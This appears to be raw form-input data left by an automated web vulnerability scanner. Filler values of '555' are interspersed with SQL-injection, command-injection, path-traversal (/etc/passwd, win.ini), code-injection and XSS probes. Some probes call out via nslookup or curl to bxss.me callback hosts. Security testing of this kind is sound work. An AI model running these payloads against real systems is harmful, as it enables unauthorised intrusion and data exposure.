555
555
555
555
xfs.bxss.me
555
555
"+"A".concat(70-3).concat(22*4).concat(113).concat(66).concat(112).concat(87)+(require"socket" Socke
555
555
555
555
555
555
555
555
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(119).concat(84).concat(106).concat(90)+(require'socket' Socke
555
555
555
555
555
555
'A'.concat(70-3).concat(22*4).concat(111).concat(79).concat(116).concat(81)+(require'socket' Socket.
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
echo yhtmmf$()\ ctoyzl\nz^xyu||a #' &echo yhtmmf$()\ ctoyzl\nz^xyu||a #|" &echo yhtmmf$()\ ctoyzl\nz
555
555
'"()
555
&echo cnplbg$()\ vvteim\nz^xyu||a #' &echo cnplbg$()\ vvteim\nz^xyu||a #|" &echo cnplbg$()\ vvteim\n
555
555
555'&&sleep(27*1000)*eablfh&&'
555
555&echo bxlpyl$()\ ngbnfo\nz^xyu||a #' &echo bxlpyl$()\ ngbnfo\nz^xyu||a #|" &echo bxlpyl$()\ ngbnf
'"
555
555"&&sleep(27*1000)*aizyue&&"
555
|echo kobcom$()\ sogamq\nz^xyu||a #' |echo kobcom$()\ sogamq\nz^xyu||a #|" |echo kobcom$()\ sogamq\n
555
<!--
555
555'||sleep(27*1000)*uykafw||'
555
555|echo stehuq$()\ zdkenz\nz^xyu||a #' |echo stehuq$()\ zdkenz\nz^xyu||a #|" |echo stehuq$()\ zdken
555
555
555
555"||sleep(27*1000)*eywump||"
555
expr 9000320096 - 930643
555
555
555
(nslookup -q=cname hitnwkchhzlld18b3c.bxss.me||curl hitnwkchhzlld18b3c.bxss.me))
555
555
555
$(nslookup -q=cname hitfmeuyfkbuq0e1a1.bxss.me||curl hitfmeuyfkbuq0e1a1.bxss.me)
555
555
555
555
&nslookup -q=cname hitpoleqxlraj786d2.bxss.me&'\"`0&nslookup -q=cname hitpoleqxlraj786d2.bxss.me&`'
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
&(nslookup -q=cname hitogifigquuda3bee.bxss.me||curl hitogifigquuda3bee.bxss.me)&'\"`0&(nslookup -q=
';print(md5(31337));$a='
555
555
|(nslookup -q=cname hitsyedpwwlvc67ce3.bxss.me||curl hitsyedpwwlvc67ce3.bxss.me)
";print(md5(31337));$a="
555
555
`(nslookup -q=cname hitydmnqwiacbd987e.bxss.me||curl hitydmnqwiacbd987e.bxss.me)`
${@print(md5(31337))}
555
;(nslookup -q=cname hitljjldenqfbced58.bxss.me||curl hitljjldenqfbced58.bxss.me)|(nslookup -q=cname
${@print(md5(31337))}\
555
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitweyvktvwzl9a33c.bxss.me||curl${IFS}hitweyvktvwzl9a33c.bxss.me)
'.print(md5(31337)).'
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitdkxqxrtyzy4eafa.bxss.me||curl${IFS}hitdkxqxrtyzy4eafa.bxss.me)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%
[removed]3Pj9(9749)[removed]
555
555
555
'"()&%
[removed]3Pj9(9450)[removed]
555
555
555
5559480558
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 5*5=25 --
-1 OR 5*5=25
-1' OR 5*5=25 --
555
-1" OR 5*5=25 --
-1' OR 5*5=25 or 'e5wIxG1X'='
-1" OR 5*5=25 or "L27vLYdU"="
555
555
555
555*if(now()=sysdate(),sleep(15),0)
555
555
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
555
555
555
555
555
555
555
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(
555
555
-1 OR 5*5=25 --
-1 OR 5*5=25
555
-1' OR 5*5=25 --
-1" OR 5*5=25 --
-1' OR 5*5=25 or 'PDuPuIxM'='
555-1; waitfor delay '0:0:15' --
-1" OR 5*5=25 or "d6aN07rY"="
555
555
555-1); waitfor delay '0:0:15' --
555*if(now()=sysdate(),sleep(15),0)
555
555
555-1 waitfor delay '0:0:15' --
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
555
555vNJLJrtE'; waitfor delay '0:0:15' --
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
555-1 OR 563=(SELECT 563 FROM PG_SLEEP(15))--
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(
555
555
555-1) OR 416=(SELECT 416 FROM PG_SLEEP(15))--
555-1; waitfor delay '0:0:15' --
555
555
555-1)) OR 324=(SELECT 324 FROM PG_SLEEP(15))--
555-1); waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555
555
555
555XadrsDxo' OR 640=(SELECT 640 FROM PG_SLEEP(15))--
555
555-1 waitfor delay '0:0:15' --
555
555
555
555UqOTy3S8') OR 280=(SELECT 280 FROM PG_SLEEP(15))--
555wxomPfTd'; waitfor delay '0:0:15' --
555
555
-1 OR 5*5=25 --
-1 OR 5*5=25
-1' OR 5*5=25 --
-1" OR 5*5=25 --
-1' OR 5*5=25 or 'aUC6nrJj'='
-1" OR 5*5=25 or "DEROE4Jp"="
555iQztW83F')) OR 615=(SELECT 615 FROM PG_SLEEP(15))--
555-1 OR 272=(SELECT 272 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555*if(now()=sysdate(),sleep(15),0)
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555-1) OR 592=(SELECT 592 FROM PG_SLEEP(15))--
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555-1)) OR 494=(SELECT 494 FROM PG_SLEEP(15))--
555
555'"
555'"\'\"
@@igPnW
(select 198766*667891)
(select 198766*667891 from DUAL)
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555HzCwBckW' OR 556=(SELECT 556 FROM PG_SLEEP(15))--
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(
555hnACRwJi') OR 816=(SELECT 816 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555-1; waitfor delay '0:0:15' --
555ZDMM3V6I')) OR 883=(SELECT 883 FROM PG_SLEEP(15))--
555
555
555-1); waitfor delay '0:0:15' --
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
555-1 waitfor delay '0:0:15' --
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
555'"\'\"
@@lLZst
(select 198766*667891)
(select 198766*667891 from DUAL)
555
555
555TUbuKhpl'; waitfor delay '0:0:15' --
555
555
555
555-1 OR 816=(SELECT 816 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555
555-1) OR 732=(SELECT 732 FROM PG_SLEEP(15))--
555
555
555
555-1)) OR 436=(SELECT 436 FROM PG_SLEEP(15))--
555
555
555
555xtku15i5' OR 423=(SELECT 423 FROM PG_SLEEP(15))--
555
555
555
555C9mZ5ka6') OR 603=(SELECT 603 FROM PG_SLEEP(15))--
555
555
555
555JjITjXUo')) OR 509=(SELECT 509 FROM PG_SLEEP(15))--
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
555'"\'\"
@@4xnKy
555
555
(select 198766*667891)
555
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 5*5=25 --
-1 OR 5*5=25
-1' OR 5*5=25 --
-1" OR 5*5=25 --
-1' OR 5*5=25 or 'sPUHtj6U'='
555
-1" OR 5*5=25 or "ahK9vR1u"="
555
555
555*if(now()=sysdate(),sleep(15),0)
555
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(
555
555
555-1; waitfor delay '0:0:15' --
555
555
555
555
555-1); waitfor delay '0:0:15' --
555
555
555
555
555
555-1 waitfor delay '0:0:15' --
555
55579jC7mP5'; waitfor delay '0:0:15' --
555
555-1 OR 959=(SELECT 959 FROM PG_SLEEP(15))--
555
555-1) OR 628=(SELECT 628 FROM PG_SLEEP(15))--
555
555-1)) OR 937=(SELECT 937 FROM PG_SLEEP(15))--
555
555RuShYCjn' OR 435=(SELECT 435 FROM PG_SLEEP(15))--
555
555r1SPDNP7') OR 303=(SELECT 303 FROM PG_SLEEP(15))--
555
555XTy3YVIG')) OR 52=(SELECT 52 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
555'"\'\"
@@1Xu3G
(select 198766*667891)
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
Jj3iK6hN
555
555
555
TbmJki5B: mAfQ7nrl
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9747967*9872949)
555
555
555
'+response.write(9747967*9872949)+'
555
555
555
"+response.write(9747967*9872949)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
${9999946+9999925}
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
12345'"\'\");|]*{ <>?''????
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
file:///etc/passwd
555
555
555
555
555
555
../555
555
555
555
555
555
555
555
555
555
555
555&n921261=v904339
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
redirtest.acx
555
555
555
555
555
555
)
555
555
555
555
!(()&&!|*|*|
555
555
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
555
555
555
555
555
555
555
/etc/shells
555
555
555
../../../../../../../../../../../../../../etc/shells
555
555
555
echo bkevhd$()\ pmycpv\nz^xyu||a #' &echo bkevhd$()\ pmycpv\nz^xyu||a #|" &echo bkevhd$()\ pmycpv\nz
c:/windows/win.ini
555
555
&echo zhqrmd$()\ ufenpa\nz^xyu||a #' &echo zhqrmd$()\ ufenpa\nz^xyu||a #|" &echo zhqrmd$()\ ufenpa\n
bxss.me
555
555
555&echo iwhglw$()\ tikodw\nz^xyu||a #' &echo iwhglw$()\ tikodw\nz^xyu||a #|" &echo iwhglw$()\ tikod
Http://bxss.me/t/fit.txt
555
555
555
http://bxss.me/t/fit.txt?.jpg
|echo amxehy$()\ sljdcd\nz^xyu||a #' |echo amxehy$()\ sljdcd\nz^xyu||a #|" |echo amxehy$()\ sljdcd\n
555
555
555
555|echo jgtznq$()\ eweyaq\nz^xyu||a #' |echo jgtznq$()\ eweyaq\nz^xyu||a #|" |echo jgtznq$()\ eweya
555
555
555
555
expr 9000260005 - 967452
555
555
555
555
(nslookup -q=cname hitkymxtapuyzc3e84.bxss.me||curl hitkymxtapuyzc3e84.bxss.me))
555
555
555
$(nslookup -q=cname hitpyrllpqbpdf2ad5.bxss.me||curl hitpyrllpqbpdf2ad5.bxss.me)
555
'.gethostbyname(lc('hitvt'.'enkrzccl7066b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(90).ch
555
555
&nslookup -q=cname hitjcculjewpj06a71.bxss.me&'\"`0&nslookup -q=cname hitjcculjewpj06a71.bxss.me&`'
".gethostbyname(lc("hitka"."ijatwezb51acb.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(82).ch
555
555
&(nslookup -q=cname hitcasosrjdifec8dc.bxss.me||curl hitcasosrjdifec8dc.bxss.me)&'\"`0&(nslookup -q=
555
gethostbyname(lc('hitcn'.'zddfmqjj5dc8e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(68).chr(
555
|(nslookup -q=cname hitbkkkcesbvz72bbc.bxss.me||curl hitbkkkcesbvz72bbc.bxss.me)
555
555
555
`(nslookup -q=cname hitsqjtfwlnjz664c9.bxss.me||curl hitsqjtfwlnjz664c9.bxss.me)`
555
555
555
;(nslookup -q=cname hitoqzgjpedjuf919f.bxss.me||curl hitoqzgjpedjuf919f.bxss.me)|(nslookup -q=cname
555
555
555
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitmgknpofbticecf3.bxss.me||curl${IFS}hitmgknpofbticecf3.bxss.me)
555
555
555
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitwolyenptlj46f32.bxss.me||curl${IFS}hitwolyenptlj46f32.bxss.me)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"()
555
555
555
555'&&sleep(27*1000)*zjlnuf&&'
555
555
555
555"&&sleep(27*1000)*bkgoey&&"
555
555
555
555
555'||sleep(27*1000)*udyvtt||'
555
555
555
555
555"||sleep(27*1000)*ziohlk||"
555
555
555
555
555
HttP://bxss.me/t/xss.html?
555
555
bxss.me/t/xss.html?
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
';print(md5(31337));$a='
555
555
555
";print(md5(31337));$a="
555
555
555
555
${@print(md5(31337))}
555
555
555
${@print(md5(31337))}\
555
555
555
555
'.print(md5(31337)).'
555
"+"A".concat(70-3).concat(22*4).concat(106).concat(83).concat(108).concat(85)+(require"socket" Socke
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(102).concat(80).concat(115).concat(83)+(require'socket' Socke
555
555
555
555
'A'.concat(70-3).concat(22*4).concat(98).concat(77).concat(97).concat(68)+(require'socket' Socket.ge
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
555
555
555
555
555
555
555
555
xfs.bxss.me
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"
<!--
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%
[removed]qNth(9829)[removed]
'"()&%
[removed]qNth(9489)[removed]
5559380316
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
5gmU8GbA
555
555
555
555
555
555
555
dG7egphY: 8vsP4tkT
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9960208*9078329)
555
555
555
'+response.write(9960208*9078329)+'
555
555
555
"+response.write(9960208*9078329)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
${10000147+10000245}
555
555
555
12345'"\'\");|]*{ <>?''????
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555&n957543=v982752
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
file:///etc/passwd
555
555
555
555
555
555
555
../555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)
555
555
555
555
555
555
!(()&&!|*|*|
555
555
555
555
555
^(#$!@#$)(()))******
redirtest.acx
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
555
555
555
/etc/shells
555
555
555
555
555
../../../../../../../../../../../../../../etc/shells
555
555
555
555
c:/windows/win.ini
555
555
555
555
555
bxss.me
555
555
555
555
555
Http://bxss.me/t/fit.txt
555
555
555
555
http://bxss.me/t/fit.txt?.jpg
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hitqr'.'orcjtfva7f3b5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(74).ch
555
555
555
555
555
".gethostbyname(lc("hitih"."uokrjdvm5818e.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(88).ch
555
555
555
555
555
HttP://bxss.me/t/xss.html?
gethostbyname(lc('hitkv'.'ovhtjpst1090f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(86).chr(
555
555
555
555
bxss.me/t/xss.html?
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
echo kesufk$()\ exlyoc\nz^xyu||a #' &echo kesufk$()\ exlyoc\nz^xyu||a #|" &echo kesufk$()\ exlyoc\nz
555
555
555
555
555
555
&echo ivcpbt$()\ djdfgt\nz^xyu||a #' &echo ivcpbt$()\ djdfgt\nz^xyu||a #|" &echo ivcpbt$()\ djdfgt\n
555
555
555
555
555
555&echo pmtjuo$()\ oneowu\nz^xyu||a #' &echo pmtjuo$()\ oneowu\nz^xyu||a #|" &echo pmtjuo$()\ oneow
555
555
555
555
555
|echo byarbw$()\ xeoiwm\nz^xyu||a #' |echo byarbw$()\ xeoiwm\nz^xyu||a #|" |echo byarbw$()\ xeoiwm\n
555
555
555
555
555|echo zwnklc$()\ bbgwrv\nz^xyu||a #' |echo zwnklc$()\ bbgwrv\nz^xyu||a #|" |echo zwnklc$()\ bbgwr
555
555
555
555
expr 9000124081 - 962235
555
555
555
555
555
(nslookup -q=cname hitxicxqejbki4707a.bxss.me||curl hitxicxqejbki4707a.bxss.me))
555
555
555
555
$(nslookup -q=cname hitoetfijdkjya5de3.bxss.me||curl hitoetfijdkjya5de3.bxss.me)
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
&nslookup -q=cname hitgjcnmngqxg5bbb7.bxss.me&'\"`0&nslookup -q=cname hitgjcnmngqxg5bbb7.bxss.me&`'
555
555
555
555
555
555
555
&(nslookup -q=cname hitizjojhbsgp959bd.bxss.me||curl hitizjojhbsgp959bd.bxss.me)&'\"`0&(nslookup -q=
555
555
555
555
555
555
|(nslookup -q=cname hitvfedskekfr6555d.bxss.me||curl hitvfedskekfr6555d.bxss.me)
555
555
555
555
555
555
`(nslookup -q=cname hittqjxxwguht12097.bxss.me||curl hittqjxxwguht12097.bxss.me)`
555
555
555
555
555
555
555
;(nslookup -q=cname hitewtusfbqcff2349.bxss.me||curl hitewtusfbqcff2349.bxss.me)|(nslookup -q=cname
555
555
555
555
555
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitalqdanetjh5b435.bxss.me||curl${IFS}hitalqdanetjh5b435.bxss.me)
555
xfs.bxss.me
555
555
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitkgukpsidrm31680.bxss.me||curl${IFS}hitkgukpsidrm31680.bxss.me)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
"+"A".concat(70-3).concat(22*4).concat(100).concat(82).concat(112).concat(85)+(require"socket" Socke
555
555
555
';print(md5(31337));$a='
555
'+'A'.concat(70-3).concat(22*4).concat(103).concat(87).concat(108).concat(88)+(require'socket' Socke
555
555
";print(md5(31337));$a="
'"
555
'A'.concat(70-3).concat(22*4).concat(108).concat(83).concat(102).concat(75)+(require'socket' Socket.
555
555
${@print(md5(31337))}
<!--
555
555
${@print(md5(31337))}\
555
555
555
555
555
'.print(md5(31337)).'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%
[removed]79UO(9998)[removed]
555
555
'"()
555
'"()&%
[removed]79UO(9661)[removed]
555
555
555
5559507872
555'&&sleep(27*1000)*yyhhwd&&'
555
555
555
555
555"&&sleep(27*1000)*zxvfko&&"
555
555
555'||sleep(27*1000)*bpmwoi||'
555
555
555"||sleep(27*1000)*lhquab||"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 5*5=25 --
-1 OR 5*5=25
-1' OR 5*5=25 --
-1" OR 5*5=25 --
-1' OR 5*5=25 or '4KSrQnnN'='
-1" OR 5*5=25 or "YuF9F9t3"="
555
555*if(now()=sysdate(),sleep(15),0)
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
555
555
555
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(
555
555-1; waitfor delay '0:0:15' --
555
555
555
555
555
555
555-1); waitfor delay '0:0:15' --
555
555-1 waitfor delay '0:0:15' --
555
555nsjPwIln'; waitfor delay '0:0:15' --
555
555-1 OR 447=(SELECT 447 FROM PG_SLEEP(15))--
555
555-1) OR 483=(SELECT 483 FROM PG_SLEEP(15))--
555
555-1)) OR 919=(SELECT 919 FROM PG_SLEEP(15))--
555
555K4CAokVF' OR 694=(SELECT 694 FROM PG_SLEEP(15))--
555
